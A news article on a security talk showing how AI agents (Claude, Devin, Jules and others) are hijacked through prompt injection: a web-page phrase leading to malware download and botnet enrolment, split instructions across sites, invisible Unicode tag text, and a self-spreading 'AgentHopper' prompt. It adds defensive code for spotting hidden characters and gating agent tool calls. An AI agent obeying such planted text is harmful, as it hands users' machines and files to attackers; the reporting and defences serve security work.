NEWS Downloaded, opened, destroyed. How AI agents like Claude and Copilot hand over your computer to hackers without your knowledge.

ExcalibuR

Just one invisible line of text is enough to turn your device into a cyberweapon.

A new warning about the threats of using AI agents was issued at the recent Chaos Communication Congress in Germany. According to cybersecurity specialist Johann Rehberger, a computer with a system like Claude Code, GitHub Copilot, Google Jules, or a similar agent installed instantly becomes vulnerable to attacks that require no user participation. A single line on a webpage or in a document is enough for the agent to pick up malicious instructions.

According to the demonstrations presented, AI assistants are particularly susceptible to attacks in which instructions are injected into ordinary text that the agent reads (prompt injection). One example was a website containing a single phrase asking to download a file. Claude, running with a computer-use tool, not only downloaded the file but also automatically made it executable, launched a terminal, and connected the device to a botnet. None of these actions required a single keystroke from the user.

Rehberger emphasized that machine learning models have significant capabilities but are extremely vulnerable in the presence of a malicious actor. He also noted that major companies like Anthropic do not fix the vulnerabilities in the agents' operational logic themselves, because they are inherent in the system architecture. Devices where AI tools are enabled should be considered already compromised, especially if the agents have access to computer management functions.

During the presentation, a whole range of scenarios in which agents execute malicious commands was demonstrated. One involved infection via split instructions placed on different websites. Specifically, the AI assistant Devin, receiving partial commands from two sources, deployed a web server, opened access to user files, and sent a link to the attacker.

Rehberger also demonstrated a method for injecting invisible text using the ASCII Smuggler tool. Such characters are impossible to notice in most editors, but AI agents interpret them as commands. As a result, Google Jules and Antigravity executed the instructions, downloaded malware, and opened remote access to the system.
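The invisible-text trick above relies on Unicode code points that render as nothing in an editor but survive copy-and-paste and are still read by a model. A defender can catch that before the text ever reaches an agent. The following scanner is an added example written for this page, not code from the talk or from the ASCII Smuggler tool: it flags and strips the Unicode Tags block (U+E0000 to U+E007F, whose upper part mirrors printable ASCII), common zero-width characters, and any other format character, and it decodes the hidden ASCII so an analyst can see what was smuggled. The sample input is constructed; `scan_files` and its suffix list are assumptions about what a repository scan would cover.

```python
"""Scan text for invisible Unicode that can carry hidden instructions to an AI agent.

Added example (not the tool or talk's own code). Intended for quarantine and
review of untrusted input such as web pages, issues, and repository files.
"""
import unicodedata
from dataclasses import dataclass
from pathlib import Path

# Unicode Tags block: U+E0020..U+E007E mirror printable ASCII 0x20..0x7E, so
# plain ASCII text can be hidden inside otherwise ordinary Unicode text.
TAG_BASE = 0xE0000
TAG_ASCII_START, TAG_ASCII_END = 0xE0020, 0xE007E
TAG_CONTROL = {0xE0001, 0xE007F}          # LANGUAGE TAG, CANCEL TAG
# Zero-width / invisible characters also used to hide or split text.
ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF, 0x00AD}


@dataclass
class ScanResult:
    clean: str                 # input with all flagged characters removed
    hidden_text: str           # ASCII decoded from tag characters, in order
    tag_count: int
    zero_width_count: int
    other_format_count: int    # remaining Cf characters, e.g. bidi overrides

    @property
    def suspicious(self) -> bool:
        return (self.tag_count + self.zero_width_count + self.other_format_count) > 0


def scan_text(text: str) -> ScanResult:
    """Classify every code point; keep only visible text in `clean`."""
    clean, hidden = [], []
    tags = zero_width = other = 0
    for ch in text:
        cp = ord(ch)
        if TAG_ASCII_START <= cp <= TAG_ASCII_END:
            tags += 1
            hidden.append(chr(cp - TAG_BASE))   # recover the smuggled ASCII
        elif cp in TAG_CONTROL:
            tags += 1
        elif cp in ZERO_WIDTH:
            zero_width += 1
        elif unicodedata.category(ch) == "Cf":
            # Caveat: this also drops legitimate format characters (e.g. ZWJ in
            # emoji sequences). Fine for a quarantine gate, not for editing content.
            other += 1
        else:
            clean.append(ch)
    return ScanResult("".join(clean), "".join(hidden), tags, zero_width, other)


def scan_files(root: str, suffixes=(".md", ".txt", ".py", ".json", ".yaml", ".yml")) -> dict:
    """Walk a directory (assumed: a checked-out repository) and report suspicious files."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            try:
                result = scan_text(path.read_text(encoding="utf-8"))
            except UnicodeDecodeError:
                continue
            if result.suspicious:
                findings[str(path)] = result
    return findings


# Constructed sample: visible text with the word "HIDDEN" written in tag
# characters (U+E0048 ... U+E004E) and a trailing zero-width space.
SAMPLE = ("Build log looks fine."
          "\U000E0048\U000E0049\U000E0044\U000E0044\U000E0045\U000E004E"
          " Ship it.\u200b")

if __name__ == "__main__":
    r = scan_text(SAMPLE)
    print("suspicious:", r.suspicious)
    print("hidden text:", repr(r.hidden_text))
    print("clean text:", repr(r.clean))
```

Run it on any text an agent is about to consume (a fetched page, an issue body, a README) and refuse or hold for review anything where `suspicious` is true. Because the check is lexical, it also works as a pre-commit or CI scan over a repository, which is the path the talk's AgentHopper scenario uses to spread a prompt between projects.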

According to Rehberger, the new Gemini 2.0 model is particularly effective at recognizing hidden characters, and this applies to all applications built on it. Even local agents like Anthropic Claude Code or Amazon Developer can execute system commands, which provides an opportunity to bypass protection and gain access to confidential information.

The concept of an AI virus called AgentHopper was also presented. It spreads not through code, but through the interaction of AI agents. A malicious prompt is embedded into a repository, after which agents copy it into other projects and pass it on. The same prompt can contain conditional branches so that it adapts to whichever AI assistant reads it.

Rehberger mentioned that he used Gemini to create this virus model, noting how much easier writing malware has become with modern AI tools.

In conclusion, the expert advised never to trust the output of language models and to minimize agents' access to system resources. He called containerization, for example via Docker, an ideal solution, as well as a complete ban on the automatic execution of commands.
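The advice in the paragraph above (treat model output as untrusted, minimise the agent's reach, never auto-execute commands) can be enforced at the point where an agent asks to use a tool. The gate below is an added example written for this page; it is not the permission system of Claude Code, Copilot, Jules, or any other product, and the tool names (`read_file`, `write_file`, `fetch_url`, `shell`), the workspace path, and the denied-verb list are assumptions. It allows read-only access inside the workspace, holds every write and network fetch for a human, never auto-runs a shell command, and refuses outright the download, `chmod +x`, execute chain from the demonstration, logging every decision for later review.

```python
"""Illustrative approval gate for an agent's tool calls (added example, not a product's code).

Policy, following the article's advice:
  * reads stay inside the workspace;
  * writes and network fetches always wait for a human (ASK);
  * shell commands are never auto-run, and commands that fetch, chmod,
    spawn interpreters, or run a file by path are refused (DENY).
"""
import shlex
from dataclasses import dataclass, field
from enum import Enum
from pathlib import PurePosixPath


class Decision(Enum):
    ALLOW = "allow"   # safe to run without a human
    ASK = "ask"       # run only after explicit human approval
    DENY = "deny"     # never run; keep the audit entry


@dataclass(frozen=True)
class ToolCall:
    tool: str         # hypothetical tool names: read_file, list_dir, search, write_file, fetch_url, shell
    args: dict


READ_ONLY_TOOLS = {"read_file", "list_dir", "search"}
# Verbs that download, change permissions, or spawn shells/interpreters.
DENIED_VERBS = {"curl", "wget", "chmod", "sh", "bash", "zsh", "eval", "source", ".",
                "python", "python3", "perl", "nc", "ncat", "sudo", "su"}
SEPARATORS = {"&&", "||", "|", ";", "&"}


@dataclass
class ToolGate:
    workspace: str
    downloaded: set = field(default_factory=set)   # destinations of fetch_url calls
    audit: list = field(default_factory=list)       # (call, decision, reason)

    def decide(self, call: ToolCall) -> Decision:
        decision, reason = self._evaluate(call)
        self.audit.append((call, decision, reason))
        return decision

    def _inside_workspace(self, path: str) -> bool:
        # Lexical check only: absolute, no '..' components, under the workspace.
        # A real gate would resolve symlinks with os.path.realpath first.
        p = PurePosixPath(path)
        return p.is_absolute() and ".." not in p.parts and PurePosixPath(self.workspace) in p.parents

    def _evaluate(self, call: ToolCall):
        path = call.args.get("path", "")
        if call.tool in READ_ONLY_TOOLS:
            if self._inside_workspace(path):
                return Decision.ALLOW, "read-only access inside workspace"
            return Decision.DENY, "read outside workspace"
        if call.tool == "write_file":
            if not self._inside_workspace(path):
                return Decision.DENY, "write outside workspace"
            if call.args.get("mode", 0) & 0o111:
                return Decision.DENY, "would create an executable file"
            return Decision.ASK, "write inside workspace"
        if call.tool == "fetch_url":
            dest = call.args.get("dest", "")
            if not self._inside_workspace(dest):
                return Decision.DENY, "download outside workspace"
            self.downloaded.add(dest)              # remember the untrusted artifact
            return Decision.ASK, "network fetch"
        if call.tool == "shell":
            return self._evaluate_shell(call.args.get("command", ""))
        return Decision.DENY, f"unknown tool {call.tool!r}"

    def _evaluate_shell(self, command: str):
        lex = shlex.shlex(command, posix=True, punctuation_chars=True)
        lex.whitespace_split = True
        try:
            tokens = list(lex)
        except ValueError:
            return Decision.DENY, "unparseable command"
        segments, current = [], []
        for tok in tokens:                         # split on &&, ||, |, ;, &
            if tok in SEPARATORS:
                segments.append(current)
                current = []
            else:
                current.append(tok)
        segments.append(current)
        for seg in segments:
            if not seg:
                continue
            verb = seg[0]
            if "/" in verb:
                return Decision.DENY, f"executes a file by path: {verb}"
            if verb in DENIED_VERBS:
                return Decision.DENY, f"denied verb: {verb}"
            if any(tok in self.downloaded for tok in seg):
                return Decision.DENY, "references a file the agent downloaded"
        return Decision.ASK, "shell command needs human approval"


if __name__ == "__main__":
    gate = ToolGate("/work/project")
    for call in [
        ToolCall("read_file", {"path": "/work/project/README.md"}),
        ToolCall("read_file", {"path": "/work/project/../../etc/passwd"}),
        ToolCall("fetch_url", {"url": "http://example.invalid/setup.sh", "dest": "/work/project/setup.sh"}),
        ToolCall("shell", {"command": "chmod +x /work/project/setup.sh && /work/project/setup.sh"}),
        ToolCall("shell", {"command": "pytest -q"}),
    ]:
        print(gate.decide(call).value, "-", gate.audit[-1][2])
```

The gate never returns ALLOW for anything that changes the host, which is the "complete ban on automatic execution" the talk recommends; ASK is where a human prompt belongs. Running the agent itself inside a container with no network and a read-only root, as the article suggests, is the second layer for the case where the gate is bypassed.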

According to Rehberger, AI tool providers openly admit they cannot guarantee the security of their products. Therefore, the main takeaway is that one should always operate under the assumption that the system could be compromised.